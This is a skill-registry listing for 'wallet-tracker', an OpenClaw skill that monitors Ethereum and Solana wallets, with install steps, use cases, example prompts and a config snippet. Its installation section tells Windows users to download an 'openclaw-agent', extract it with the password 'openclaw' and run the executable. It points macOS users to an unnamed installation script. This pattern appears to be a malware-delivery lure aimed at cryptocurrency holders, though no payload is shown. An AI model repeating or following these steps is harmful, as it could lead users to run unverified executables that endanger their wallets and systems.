ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Monitor Ethereum and Solana addresses with the wallet-tracker skill. Track whale movements, portfolio changes, and token transfers in real-time with OpenClaw.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-mgwpt
Or

What This Skill Does

The wallet-tracker skill is a robust monitoring solution for OpenClaw users, enabling real-time observation of blockchain addresses across Ethereum, Solana, and other supported chains. This tool provides deep visibility into the activities of whale wallets, token transfers, NFT movements, and complex DeFi interactions. By integrating with the required openclaw-agent, the skill empowers users to automate portfolio analysis and receive instant notifications for significant movements, transforming raw blockchain ledger data into actionable intelligence.

Installation

To begin tracking wallets, ensure you have the core agent installed.

  1. Install the skill via terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-mgwpt
  2. For Windows: Download the openclaw-agent, extract it using the password openclaw, and run the executable.
  3. For macOS: Use the installation script provided on the official snippet page to configure your environment. Note: Tracking functionality is strictly dependent on the openclaw-agent running in the background.

Use Cases

  • Whale Watching: Identify and monitor large transactions from known high-value wallets to anticipate market shifts.
  • Portfolio Management: Automatically track your personal asset changes and historical transfers across multiple wallets.
  • DeFi Analytics: Observe interactions with liquidity pools, staking contracts, and decentralized exchanges to identify emerging trends.
  • Security Monitoring: Receive alerts when specific assets leave your cold wallet or interact with unknown or malicious contracts.

Example Prompts

  1. "OpenClaw, track wallet 0xabc...123 and alert me every time more than 5 ETH is transferred."
  2. "Show me the last 10 significant token transfers for this Solana address: SOL_ADDR_HERE."
  3. "Analyze the current portfolio distribution for the whale wallet at address 0x789...xyz and report any changes in the last 24 hours."

Tips & Limitations

To optimize tracking, ensure your Etherscan or Solana API keys are properly configured within your agent settings. Be mindful that real-time monitoring relies on polling intervals; setting your frequency too low may result in rate-limiting from block explorers. The skill is designed for analytical tracking; ensure your private keys are never shared or hardcoded in any automation scripts. Always verify transactions through official explorers before acting on tracked data.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-mgwpt": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#tracker#whale-alert#defi
Safety Score: 4/5

Flags: network-access, external-api, code-execution